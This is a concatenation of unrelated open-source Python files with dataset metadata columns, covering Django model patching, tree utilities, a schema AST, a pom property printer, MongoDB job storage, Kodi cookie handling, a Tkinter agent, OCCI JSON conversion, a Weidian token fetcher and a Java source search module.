methods = dict((k, '%s_%s' % (k, methods)) for k in ['set', 'uset', 'is', 'count', 'users'])
# Patch methods
for k in methods:
if k == 'set':
if positive_only:
setattr(model,methods[k],lambda self, user, **kwargs: register(code,user,self,unique,positive=True,counter_field=counter_field))
else:
setattr(model,methods[k],lambda self, user, positive=True: register(code,user,self,unique,positive=positive,counter_field=counter_field))
elif k == 'uset':
setattr(model,methods[k],lambda self, user: unregister(code,user,self,unique,counter_field=counter_field))
elif k == 'is':
setattr(model,methods[k],lambda self, user: isregister(code,user,self,unique))
elif k == 'count':
if positive_only:
setattr(model,methods[k],lambda self, **kwargs: countregister(code,self,positive=True))
else:
setattr(model,methods[k],lambda self, positive=True: countregister(code,self,positive=positive))
elif k == 'users':
setattr(model, methods[k], lambda self, positive=True: get_users(code, self, positive=positive))
else:
raise Exception, 'Undefined method: %s' % methods[k]
if counter_field:
fields = model._meta.get_all_field_names()
if not isinstance(counter_field,(list,tuple)):
counter_field = [counter_field]
# Patch model fields
for f in counter_field:
if f not in fields:
# Add counter field as usigned int
model.add_to_class(f, models.PositiveIntegerField(default=0,editable=True,blank=True))
def __init_patch__(**kwargs):
if not getattr(__init_patch__,'inited',False):
from .settings import ATOMREGISTER
for k in ATOMREGISTER:
app, mod = k.split('.')
model = import_class('%s.models' % app, mod)
monkey(model,ATOMREGISTER[k])
setattr(__init_patch__,'inited',True)
if len(sys.argv)>1 and ('run' in sys.argv[1] or 'server' in sys.argv[1] or sys.argv[1] in ['supervisor']):
request_started.connect(__init_patch__)
else:
__init_patch__()
| mit | -7,094,024,707,691,127,000 | 37.48 | 153 | 0.623008 | false | 3.802372 | false | false | false |
pyannote/pyannote-banyan | banyan/_common_base.py | 2 | 1906 | from functools import wraps
import inspect
import collections
import warnings
import types
import sys
from ._dummy_key import _CmpDummyKey as _CmpDummyKey
RED_BLACK_TREE = 0
"""
Red-black tree algorithm indicator; good for general use.
"""
SPLAY_TREE = 1
"""
Splay tree algorithm indicator; good for temporal locality cases.
"""
SORTED_LIST = 2
"""
Sorted list algorithm indicator; good for infrequent updates.
"""
def _updator_metadata(set_, init_info):
if init_info.updator is None:
return None
name_clss = [(name, cls) for \
(name, cls) in inspect.getmembers(init_info.updator, predicate = inspect.isclass) if name == 'Metadata']
assert len(name_clss) == 1
cls = name_clss[0][1]
compare = init_info.compare if init_info.compare is not None else \
lambda x, y: -1 if x < y else (0 if x == y else 1)
def update(m, key, l, r):
m.update(
key,
init_info.key if init_info.key is not None else lambda k: _CmpDummyKey(compare, k),
l,
r)
return (cls, update)
def _adopt_updator_methods(self, updator):
def method_wrapper(f):
def wrapper(*args, **kwargs):
return f(self, *args, **kwargs)
return wraps(f)(wrapper)
if updator is None:
return
for name, method in inspect.getmembers(updator()):
if name.find('_') == 0 or name in self.__dict__ or name == 'Metadata':
continue
try:
method_ = method.__func__ if sys.version_info >= (3, 0) else method.im_func
self.__dict__[name] = method_wrapper(method_)
except AttributeError:
warnings.warn(name, RuntimeWarning)
_CommonInitInfo = collections.namedtuple(
'_CommonInitInfo',
['key_type', 'alg', 'key', 'compare', 'updator'],
verbose = False)
| bsd-3-clause | -5,718,820,225,957,598,000 | 25.109589 | 112 | 0.593914 | false | 3.729941 | false | false | false |
neumark/unimodel | unimodel/ast.py | 1 | 2938 | """ Schema for unimodel objects.
This allow us to do several things:
- Encode the schema of the message along with the message itself
- Build ASTs from generators which take eg. jsonschema as input
- Create classes at runtime based on a schema (jsonschema or thrift)
etc.
"""
from unimodel.model import Unimodel, UnimodelUnion, Field, FieldFactory
from unimodel import types
from unimodel.metadata import Metadata
from unimodel.backends.json.type_data import MDK_TYPE_STRUCT_UNBOXED
import inspect
class SchemaObjectMetadata(Unimodel):
# TODO: validators
backend_data = Field(
types.Map(
types.UTF8, # Key is the name of the backend, eg: 'thrift'
# data for each backend should be represented as a simple dict
types.Map(types.UTF8, types.UTF8)))
class SchemaObject(Unimodel):
name = Field(types.UTF8, required=True)
namespace = Field(types.List(types.UTF8))
uri = Field(types.UTF8)
metadata = Field(types.Struct(SchemaObjectMetadata))
schema_object_field = Field(
types.Struct(SchemaObject),
required=True,
metadata=Metadata(
backend_data={'json': {MDK_TYPE_STRUCT_UNBOXED: True}}))
type_id_enum = types.Enum(types.type_id_to_name_dict())
# TypeDef is recursive because of ParametricType
class TypeDef(Unimodel):
pass
# List, Set, Map, Tuple
class ParametricType(Unimodel):
type_id = Field(type_id_enum, required=True)
type_parameters = Field(types.List(types.Struct(TypeDef)), required=True)
class TypeClass(UnimodelUnion):
primitive_type_id = Field(type_id_enum)
enum = Field(types.Map(types.Int, types.UTF8))
struct_name = Field(types.UTF8)
parametric_type = Field(types.Struct(ParametricType))
field_factory = FieldFactory()
field_factory.add_fields(TypeDef, {
'metadata': Field(types.Struct(SchemaObjectMetadata)),
'type_class': Field(types.Struct(TypeClass), required=True)})
class LiteralValue(UnimodelUnion):
integer = Field(types.Int)
double = Field(types.Double)
string = Field(types.UTF8)
class Literal(Unimodel):
literal_value = Field(types.Struct(LiteralValue()))
metadata = Field(
types.Struct(SchemaObjectMetadata),
metadata=Metadata(
backend_data={'json': {MDK_TYPE_STRUCT_UNBOXED: True}}))
class FieldDef(Unimodel):
common = schema_object_field
field_id = Field(types.Int)
field_type = Field(types.Struct(TypeDef), required=True)
required = Field(types.Bool, default=False)
default = Field(types.Struct(Literal))
class StructDef(Unimodel):
common = schema_object_field
is_union = Field(types.Bool, default=False)
fields = Field(types.List(types.Struct(FieldDef)), required=True)
class SchemaAST(Unimodel):
common = schema_object_field
description = Field(types.UTF8)
structs = Field(types.List(types.Struct(StructDef)))
root_struct_name = Field(types.UTF8)
| apache-2.0 | -2,165,810,892,055,699,000 | 30.255319 | 77 | 0.707624 | false | 3.548309 | false | false | false |
ericzundel/mvn2pants | src/python/squarepants/pom_properties.py | 1 | 1966 | #!/usr/bin/env python2.7
#
# Print properties from the pom.xml file as BASH variable settings.
# Note that the '.' characters in property names are re-written as '_'
#
import os
import re
import sys
from pom_handlers import DependencyInfo
from pom_utils import PomUtils
class PomProperties(object):
def safe_property_name(self, property_name):
"""Replace characters that aren't safe for bash variables with an underscore"""
return re.sub(r'\W', '_', property_name)
def write_properties(self, pom_file_path, output_stream, rootdir=None):
di = DependencyInfo(pom_file_path, rootdir)
for property_name, value in di.properties.iteritems():
output_stream.write('{0}="{1}"\n'.format(self.safe_property_name(property_name), value))
# Print out some other things. These are useful for script/pants_kochiku_build_wrapper
output_stream.write('project_artifactId="{0}"\n'.format(di.artifactId))
output_stream.write('project_groupId="{0}"\n'.format(di.groupId))
def usage():
print "usage: {0} [args] ".format(sys.argv[0])
print "Prints all the properties defined in a pom.xml in bash variable syntax."
print ""
print "-?,-h Show this message"
PomUtils.common_usage()
sys.exit(1)
def main():
arguments = PomUtils.parse_common_args(sys.argv[1:])
flags = set(arg for arg in arguments if arg.startswith('-'))
for f in flags:
if f == '-h' or f == '-?':
usage()
return
else:
print ("Unknown flag {0}".format(f))
usage()
return
path_args = list(set(arguments) - flags)
if len(path_args) != 1 :
print("Expected a single project path that contains a pom.xml file.")
usage()
pom_file_path = os.path.join(os.path.realpath(path_args[0]), 'pom.xml')
if not os.path.exists(pom_file_path):
print ("Couldn't find {0}".format(pom_file_path))
usage()
PomProperties().write_properties(pom_file_path, sys.stdout)
if __name__ == '__main__':
main()
| apache-2.0 | -266,190,076,049,275,940 | 27.085714 | 94 | 0.667854 | false | 3.315346 | false | false | false |
jianhuashao/WebDownloadJobsManage | server/db_insert_jobs_base.py | 1 | 1293 | from pymongo import MongoClient
import pymongo
from datetime import datetime
mongodb_url = 'mongodb://192.168.0.30:27017/'
mongodb_url = 'mongodb://127.0.0.1:27017/'
client = MongoClient(mongodb_url)
db = client['web_jobs_server']
db = client['test_web_jobs_server']
print "** DB Collections: ", db.collection_names()
#collection = db[job_target]
#print collection
def make_job(job_id, job_url, job_file_path, client_id, create_date, update_date, job_status, http_status):
job = {
"job_id": job_id,
"job_url":job_url,
"job_file_path": job_file_path,
"client_id": client_id,
"create_date": create_date,
"update_date": update_date,
"job_status": job_status,
"http_status": http_status
}
return job
## insert: only be used for fresh insert, as existing _id would cause duplicate insert and then error
## save: same as _update method, but would create collection if it is not exist
## consider with ejdb does not support custom _id, so I have to use upsert
def job_upsert(job, collection):
j = db[collection].update({'job_id': job['job_id']}, {'$set':job}, upsert=True, multi=True)
print j
def job_insert(job, collection):
try:
j = db[collection].insert(job)
except pymongo.errors.DuplicateKeyError as e:
#print e
pass
except Exception as e:
#print e
pass
| apache-2.0 | 1,375,580,046,111,213,800 | 28.386364 | 107 | 0.703016 | false | 2.931973 | false | false | false |
eracknaphobia/plugin.video.mlbtv | resources/lib/utils.py | 1 | 2470 | import os, re, sys
from kodi_six import xbmc, xbmcvfs, xbmcaddon
if sys.version_info[0] > 2:
import http
cookielib = http.cookiejar
else:
import cookielib
try:
xbmc.translatePath = xbmcvfs.translatePath
except AttributeError:
pass
class Util:
addon_path = xbmc.translatePath(xbmcaddon.Addon().getAddonInfo('profile'))
def find(self, source, start_str, end_str):
start = source.find(start_str)
end = source.find(end_str, start + len(start_str))
if start != -1:
return source[start + len(start_str):end]
else:
return ''
def natural_sort_key(self, s):
_nsre = re.compile('([0-9]+)')
return [int(text) if text.isdigit() else text.lower()
for text in re.split(_nsre, s)]
def save_cookies(self, cookiejar):
cookie_file = os.path.join(self.addon_path, 'cookies.lwp')
cj = cookielib.LWPCookieJar()
try:
cj.load(cookie_file, ignore_discard=True)
except:
pass
for c in cookiejar:
args = dict(vars(c).items())
args['rest'] = args['_rest']
del args['_rest']
c = cookielib.Cookie(**args)
cj.set_cookie(c)
cj.save(cookie_file, ignore_discard=True)
def load_cookies(self):
cookie_file = os.path.join(self.addon_path, 'cookies.lwp')
cj = cookielib.LWPCookieJar()
try:
cj.load(cookie_file, ignore_discard=True)
except:
pass
return cj
def check_cookies(self):
perform_login = True
if os.path.isfile(os.path.join(self.addon_path, 'cookies.lwp')):
fingerprint_valid = False
ipid_valid = False
cj = cookielib.LWPCookieJar(os.path.join(self.addon_path, 'cookies.lwp'))
cj.load(os.path.join(self.addon_path, 'cookies.lwp'), ignore_discard=True)
for cookie in cj:
if cookie.name == "fprt" and not cookie.is_expired():
fingerprint_valid = True
elif cookie.name == "ipid" and not cookie.is_expired():
ipid_valid = True
if fingerprint_valid and ipid_valid:
perform_login = False
return perform_login
def delete_cookies(self):
if os.path.isfile(os.path.join(self.addon_path, 'cookies.lwp')):
os.remove(os.path.join(self.addon_path, 'cookies.lwp'))
| gpl-2.0 | -3,549,970,746,934,953,500 | 30.666667 | 86 | 0.57166 | false | 3.627019 | false | false | false |
MarouenMechtri/CNG-Manager | pyocni/adapters/cnv_toHTTP.py | 3 | 9363 | # Copyright 2010-2012 Institut Mines-Telecom
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Jun 21, 2012
@author: Bilel Msekni
@contact: [email protected]
@author: Houssem Medhioub
@contact: [email protected]
@organization: Institut Mines-Telecom - Telecom SudParis
@license: Apache License, Version 2.0
"""
try:
import simplejson as json
except ImportError:
import json
def extract_term_from_category(json_object):
"""
returns the term from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('term'):
return json_object['term']
else:
return None
def extract_scheme_from_category(json_object):
"""
returns the scheme from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('scheme'):
return json_object['scheme']
else:
return None
def extract_location_from_category(json_object):
"""
returns the location from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('location'):
return json_object['location']
else:
return None
def extract_title_from_category(json_object):
"""
returns the title from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('title'):
return json_object['title']
else:
return None
def extract_related_from_category(json_object):
"""
returns the related from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('related'):
items = json_object['related']
rel = ""
for item in items:
rel += item + ","
rel = rel[:-1]
else:
rel = None
return rel
def extract_actions_from_category(json_object):
"""
returns the actions from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('actions'):
items = json_object['actions']
actions = ""
for item in items:
actions += item + ","
actions = actions[:-1]
else:
actions = None
return actions
def extract_attributes_from_category(json_object):
"""
returns the attributes from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('attributes'):
items = json_object['attributes']
attributes = recursive_for_attribute(items)
htt_att = ""
for att in attributes:
htt_att += att + ","
attributes = htt_att[:-1]
else:
attributes = None
return attributes
def extract_kind_from_entity(json_object):
"""
returns the HTTP kind description extracted from a json entity representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('kind'):
kind_id = json_object['kind']
kind_scheme, kind_term = kind_id.split('#')
return kind_term + "; scheme=\"" + kind_scheme + "\"; class=\"kind\";"
else:
return None
def extract_mixin_from_entity(json_object):
"""
returns mixins of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('mixin'):
mix_http = list()
mixins = json_object['mixin']
for item in mixins:
mix_scheme, mix_term = item.split('#')
mix_http.append(mix_term + "; scheme=\"" + mix_scheme + "\"; class=\"mixin\";")
return mix_http
else:
return None
def extract_id_from_entity(json_object):
"""
returns id of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('id'):
return json_object['id']
else:
return None
def extract_title_from_entity(json_object):
"""
returns title of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('title'):
return json_object['title']
else:
return None
def extract_actions_from_entity(json_object):
"""
returns actions of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('actions'):
items = json_object['actions']
actions = list()
for item in items:
actions.append("<" + item['href'] + ">; rel=\"" + item['category'] + "\"")
return actions
else:
return None
def extract_internal_link_from_entity(json_object):
"""
returns internal links of the entity
Args:
@param json_object: JSON representation
"""
if json_object.has_key('links'):
items = json_object['links']
links = list()
for item in items:
uri = "|zizi|"
rel = "|zala|"
category = item['kind']
self = "|zolo|"
link = "<" + uri + ">; rel=\"" + rel + "\"; self=\"" + self + "\"; category=\"" + category + "\";"
if item.has_key('attributes'):
attributes = recursive_for_attribute_v2(item['attributes'])
for att in attributes:
link += att[:-1] + ";"
links.append(link)
return links
else:
return None
def extract_attributes_from_entity(json_object):
"""
returns the attributes from a json representation
Args:
@param json_object: JSON representation
"""
if json_object.has_key('attributes'):
items = json_object['attributes']
attributes = recursive_for_attribute_v2(items)
return attributes
else:
return None
def treat_attribute_members(members):
to_return = ""
for key in members.keys():
if key == "mutable":
if members[key] is True:
to_return += ""
else:
to_return += "{immutable}"
elif key == "required":
if members[key] is True:
to_return += "{required}"
else:
to_return += ""
else:
pass
return [to_return]
def recursive_for_attribute(attributes):
"""
"""
att_http = list()
for key in attributes.keys():
if type(attributes[key]) is dict:
items = recursive_for_attribute(attributes[key])
for item in items:
if not (item.find('{')):
att_http.append(key + item)
else:
att_http.append(key + "." + item)
else:
attributes = treat_attribute_members(attributes)
return attributes
final_att = list()
for item in att_http:
if item.endswith('.'):
final_att.append(item[:-1])
else:
final_att.append(item)
return final_att
def treat_attribute_members_v2(attributes):
to_return = list()
for key in attributes.keys():
to_return.append(key + "=\"" + str(attributes[key]) + "\"")
return to_return
def recursive_for_attribute_v2(attributes):
"""
"""
att_http = list()
for key in attributes.keys():
if type(attributes[key]) is dict:
items = recursive_for_attribute_v2(attributes[key])
for item in items:
att_http.append(key + "." + item)
else:
attributes = treat_attribute_members_v2(attributes)
return attributes
return att_http
if __name__ == '__main__':
print '====== Test ======'
att = """
{
"occi": {
"compute": {
"speed": 2,
"memory": 4,
"cores": 2
}
},
"org": {
"other": {
"occi": {
"my_mixin": {
"my_attribute": "my_value"
}
}
}
}
}
"""
attold = """
{"occi": {
"compute": {
"hostname": {
"mutable": true,
"required": false,
"type": "string",
"pattern": "(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\\\\-]*[a-zA-Z0-9])\\\\.)*",
"minimum": "1",
"maximum": "255"
},
"state": {
"mutable": false,
"required": false,
"type": "string",
"pattern": "inactive|active|suspended|failed",
"default": "inactive"
}
}
}}
"""
att_obj = json.loads(att)
res = recursive_for_attribute_v2(att_obj)
# json_mixin = json.loads(mixin)
# res = convert_json_action_to_http_action(json_mixin)
print res
| apache-2.0 | 8,804,081,542,698,351,000 | 24.793388 | 110 | 0.550785 | false | 4.030564 | false | false | false |
AsherYang/ThreeLine | server/shserver/GetToken.py | 1 | 4145 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Author: AsherYang
Email: [email protected]
Date: 2017/7/24
Desc: get weidian token
@see https://wiki.open.weidian.com/guide#145
https://oauth.open.weidian.com/token?grant_type=client_credential&appkey=xxx&secret=xxx
必须为get 请求
"""
import json
import time
import DbUtil
import OpenRequest
import TokenConstant
from Token import Token
# import ssl
# get_token_url = "https://oauth.open.weidian.com/token?grant_type=client_credential&appkey=" + TokenConstant.appkey + "&secret=" + TokenConstant.secret
# ssl._create_default_https_context = ssl._create_unverified_context
# 服务型URL
# get_token_url = '%s/oauth2/access_token' % TokenConstant.domain
# 自用型
get_token_url = '%s/token' % TokenConstant.domain
# ====== get 方式 20170907 之前版本,由于微店更改规则,导致直接获取无效,以下面方式模仿浏览器行为 =========
# def getTokenFromNet():
# # request 封装
# request = urllib2.Request(url=get_token_url)
# # 发起请求
# html = urllib2.urlopen(request)
# response_data = html.read()
# print response_data
# jsonToken = json.loads(response_data)
# access_token = jsonToken['result']['access_token']
# expire_in = jsonToken['result']['expire_in']
# token = Token()
# token.access_token = access_token
# token.expire_in = expire_in
# return token
def getTokenFromNet():
params = {"appkey": TokenConstant.appkey, "secret": TokenConstant.secret, "grant_type": "client_credential"}
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
}
body = OpenRequest.http_get(get_token_url, params=params, header=header)
print body
jsonToken = json.loads(body)
access_token = jsonToken['result']['access_token']
expire_in = jsonToken['result']['expire_in']
token = Token()
token.access_token = access_token
token.expire_in = expire_in
return token
# ====== get token from db ========
def getTokenFromDb():
query = "select * from sh_token where update_time = (select max(update_time) from sh_token)"
token = Token()
results = DbUtil.query(query)
# print results
if results is None:
return None
for row in results:
row_id = row[0]
access_token = row[1]
expire_in = row[2]
update_time = row[3]
token.access_token = access_token
token.expire_in = expire_in
token.update_time = update_time
# print "row_id = %s, access_token = %s, expire_in = %s, update_time = %s " %(row_id, access_token, expire_in, update_time)
return token
# ====== save token to db =======
def saveToDb(token=None, expire_in=None):
if token is None or expire_in is None:
print "token is %s, expire_in is %s" % (token, expire_in)
return
else:
# locattime = time.asctime(time.localtime(time.time()))
# current_milli_time = lambda: int(round(time.time() * 1000))
# print locattime
# print current_milli_time()
locattime = int(time.time())
insert = 'insert into sh_token (access_token, expire_in, update_time) values("%s", "%s", "%s")' %(token, expire_in, locattime)
DbUtil.insert(insert)
def doGetToken():
dbToken = getTokenFromDb()
currentTime = int(time.time())
if dbToken is None:
netToken = getTokenFromNet()
saveToDb(netToken.access_token, netToken.expire_in)
print "ok , update token from net success, when dbToken is null. "
return netToken.access_token
if currentTime >= int(dbToken.update_time) + int(dbToken.expire_in):
print "currentTime = %s , update_time = %s " % (currentTime, dbToken.update_time)
# expired
netToken = getTokenFromNet()
saveToDb(netToken.access_token, netToken.expire_in)
print "ok , update token from net success. "
return netToken.access_token
else:
print "ok , token in date. "
return dbToken.access_token
if __name__ == '__main__':
doGetToken()
| apache-2.0 | 7,821,242,104,657,829,000 | 32.641667 | 152 | 0.642061 | false | 3.098235 | false | false | false |
davidko/evolspyse | core/agents/tkagent.py | 2 | 1603 | """Spyse Tkinter UI agent module"""
from spyse.core.agents.ui import UIAgent
from spyse.core.content.content import ACLMessage
from Tkinter import *
class TkinterAgent(UIAgent):
"""A Tkinter UI agent"""
# http://www.python.org/topics/tkinter/
# the next two lines of code need to be commented out for epydoc to work
__root = Tk()
__root.withdraw()
def __init__(self, name, mts, **namedargs):
super(TkinterAgent, self).__init__(name, mts, **namedargs)
#self.__root = Tk()
# if not hasattr(self, '__root'):
# self.__root = Tk()
# self.__root.title("Root")
#self.__root.withdraw() # won't need this
#self.__root.mainloop()
# setattr(self, '__root', Tk())
self.top = Toplevel(self.__root)
self.top.title(name)
#self.top.protocol("WM_DELETE_WINDOW", self.top.destroy)
self.create_widgets(self.top)
def make_Tk(root):
root.title("Spyse Agent Management System")
title_label = Label(root)
title_label["text"]="Spyse - Agent Management System"
title_label.pack()
quit_button = Button(root, command=quit) # doesn't work
quit_button["text"]="Quit"
quit_button.pack()
#root.withdraw()
def create_widgets(self, frame):
# Override
pass
def take_down(self):
print "destroying toplevel"
#self.top.destroy()
# TODO: is there a better way to kill windows ???
@classmethod
def run_GUI(cls):
cls.__root.mainloop()
# run_GUI = classmethod(run_GUI)
| lgpl-2.1 | -5,265,511,297,091,729,000 | 28.685185 | 76 | 0.588272 | false | 3.61036 | false | false | false |
TUBAME/migration-tool | src/tubame.portability/resources/tubame-search-modules/src/migration/jbmst_search_java.py | 2 | 11779 | # -*- coding: utf-8 -*-
"""
jbmst_search_java.py
Created on 2013/06/28
Copyright (C) 2011-2013 Nippon Telegraph and Telephone Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
Java search process.
Extension to search for the file processing of java.
Do not search for the comment text.
If only Search Keyword1, and returns the results of the search in Search Keyword1.
If the Search Keyword2 is also present, and returns the results to find the search file again by the Search Keyword2.
[Environment] Python 2.7
"""
import re, sys,os
SINGLE_COMMENT = "SINGLE_COMMENT"
MULTI_COMMENT = "MULTI_COMMENT"
MULTI_COMMENT_END = "MULTI_COMMENT_END"
JAVA_SOURCE = "JAVA_SOURCE"
"""
Check single comment, multi comment, whether the source is searched record,
and returns a status corresponding to the type of statement.
@param pLine:Record to search for files
@retutn Type of sentence of one line to search for file
"""
def isSingleComment(pLine,LINE_HEAD_COMMENT_STR = "//"):
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT =None
m = re.search("^\s*"+LINE_HEAD_COMMENT_STR,pLine)
if m:
return SINGLE_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
#support end of line comment
m = re.search("(\s*\w*)"+LINE_HEAD_COMMENT_STR,pLine)
if m:
m = re.search("[^"+LINE_HEAD_COMMENT_STR+"]*",pLine)
if m != None:
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT = m.group()
m = re.search("^\s*/\*",pLine)
if m:
m = re.search("\*/\s*$",pLine)
if m:
return SINGLE_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
return MULTI_COMMENT,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
else:
#support end of line comment
m = re.search("(\s*\w*)/\*.*\*/$",pLine)
if m:
result = m.group()
if result != None:
index = len(result)
JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT =pLine[:-index]
return JAVA_SOURCE,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
"""
Search records it is determined whether the end of the multi comment statement.
@param pLine:Record to search for files
@retutn Type of sentence of one line to search for file
"""
def isMultiCommentEnd(pLine):
m = re.search("\*/\s*$",pLine)
if m:
return MULTI_COMMENT_END
return MULTI_COMMENT
"""
Function is not using
@param pSeachKey
@param pLine
@return
"""
def searchByLine(pSeachKey,pLine):
m = re.search(pSeachKey,pLine)
if m:
return "FOUND"
return "NOT_FOUND"
"""
If this is not the comment text, to search for in the Search Keyword1 or Search Keyword2.
Set the search list the corresponding line number of the line that matches the above.
@param pSearchFile File to be searched
@param pSearchStr Search Keyword1 or Search Keyword2
@return List of search corresponding line
"""
def search_open_file(pSearchFile,pSearchStr,isFirstMatchExit=False,LINE_HEAD_COMMENT_STR = "//",isSemicolonParser=False,pSearchStr2="",pFlag=0):
current_line_status = "NONE"
line_count = 0
line_count_list = []
searchTargetBody = ""
searchTargetBodyIncludedComment= ""
# Open the search files
f = open(pSearchFile, "r")
for line in f:
searchTargetBodyIncludedComment += line
line_count += 1
# Determine the type of sentence
line_status ,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
# Distributes the processing according to the type of sentence
if ( current_line_status == MULTI_COMMENT):
# If multi-sentence comment
if (isMultiCommentEnd(line) == MULTI_COMMENT_END):
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if (line_status == JAVA_SOURCE):
# If this is not the comment text
# suuport end of line comment
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
#セミコロンまでをひとつのトークンとして検索を行う
if isSemicolonParser == True:
searchTargetBody += line
if hasEndSemicolon(searchTargetBody) == True:
find_result = findByKeywords(pSearchStr,pSearchStr2,LINE_HEAD_COMMENT_STR,searchTargetBody,searchTargetBodyIncludedComment.rstrip(),line_count,pFlag)
line_count_list += find_result
searchTargetBodyIncludedComment = ""
searchTargetBody = ""
else:
m = findAll(pSearchStr,line,pFlag)
if m:
for hit in m:
line_count_list.append(line_count)
if isFirstMatchExit == True:
f.close()
return line_count_list
current_line_status = line_status
f.close()
return line_count_list
def findAll(pSearchStr,pLine,pFlag=0):
return re.findall(pSearchStr,pLine,pFlag)
def hasEndSemicolon(pTarget):
if re.search(".*;\s*$",pTarget):
return True
return False
def hasEndBackSlash(pTarget):
if re.search(".*\\s*$",pTarget):
return True
return False
# def getIndexBaseEndofLine(body,match):
# print 'body:',body
# tokens = body.split(';')
# if len(tokens) != 0:
# if not match.end() +1 > len(body):
# match_after_line = body[match.end()+1:]
# print 'match_after_line' ,match_after_line
# m = match_after_line.split(';')
# if m:
# return m[0].count('\n')
# else:
# return 0
def getMatch(pSearchStr2,append_line):
match = re.finditer(pSearchStr2,append_line)
return len(match),match
def findByKeywords(pSearchStr1,pSearchStr2,LINE_HEAD_COMMENT_STR,pSearchTarget,pSearchTargetIncludedComment,pline_count,pFlag=0):
result_list = []
#print pSearchTarget
#print pSearchStr1
# コメントを除去したものを対象がヒットしない場合は処理しない
m= re.findall(pSearchStr1,pSearchTarget.replace('\n',''),pFlag)
if len(m) == 0:
return result_list
if pSearchStr2 == "":
searchKey =pSearchStr1
else:
searchKey =pSearchStr2
lines = pSearchTargetIncludedComment.split('\n')
line_length = len(lines)
line_count = 0
current_line_status = "NONE"
firstMatch = False
append_line = ""
match_len = 0
for line in lines:
line_count += 1
line_status ,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
if current_line_status == MULTI_COMMENT:
# If multi-sentence comment
if isMultiCommentEnd(line) == MULTI_COMMENT_END:
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if line_status == JAVA_SOURCE:
# If this is not the comment text
# suuport end of line comment
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
append_line += line
if firstMatch == False:
match = re.finditer(searchKey,append_line,pFlag)
i = 0
for m in match:
result_list.append(pline_count - (line_length -line_count))
i += 1
firstMatch = True
if i !=0:
match_len = i
else:
match = re.finditer(searchKey,append_line,pFlag)
i = 0
for m in match:
if i >= match_len:
result_list.append(pline_count - (line_length -line_count))
i = i + 1
if i > 0:
match_len = i
current_line_status = line_status
return result_list
def searchInterfaceMethod(pSearchFile,LINE_HEAD_COMMENT_STR="//"):
current_line_status = "NONE"
line_count = 0
methodname_list = []
# Open the search files
f = open(pSearchFile, "r")
for line in f:
line_count += 1
# Determine the type of sentence
line_status,JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT= isSingleComment(line,LINE_HEAD_COMMENT_STR)
# Distributes the processing according to the type of sentence
if ( current_line_status == MULTI_COMMENT):
# If multi-sentence comment
if (isMultiCommentEnd(line) == MULTI_COMMENT_END):
# If the multi-comment statement is completed
current_line_status = JAVA_SOURCE
else:
if (line_status == JAVA_SOURCE):
# If this is not the comment text
# suuport end of line comment
if JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT != None:
line = JAVA_SOURCE_EXCLUSION_END_OF_LINE_COMMENT
m = re.search("^(?!.*\s+(static|new)\s+).*$",line)
if m != None:
m =re.search("\w+\s+(\w+)\s*\(.*",line)
if m:
method_name=m.group(1)
methodname_list.append(method_name)
f.close()
return methodname_list
"""
If only Search Keyword1, and returns the results of the search in Search Keyword1.
If the Search Keyword2 is also present, and returns the results to find the search file again by the Search Keyword2.
@param pSearchFile File to be searched
@param pSearchStr1 Search Keyword1
@param pSearchStr2 Search Keyword2
@retutn List of lines that hit the search
"""
def searchByFile(pSearchFile,pSearchStr1,pSearchStr2,isFirstMatchExit=False,LINE_HEAD_COMMENT_STR = "//",IS_SEMICOLON_PARSER=False,FLAG=0):
result_hit_count_list = []
if pSearchStr2 != "" and IS_SEMICOLON_PARSER == True:
#SEMICOLON_PARSERの場合のみ、そのまま、第2キワードで検索を実施する。
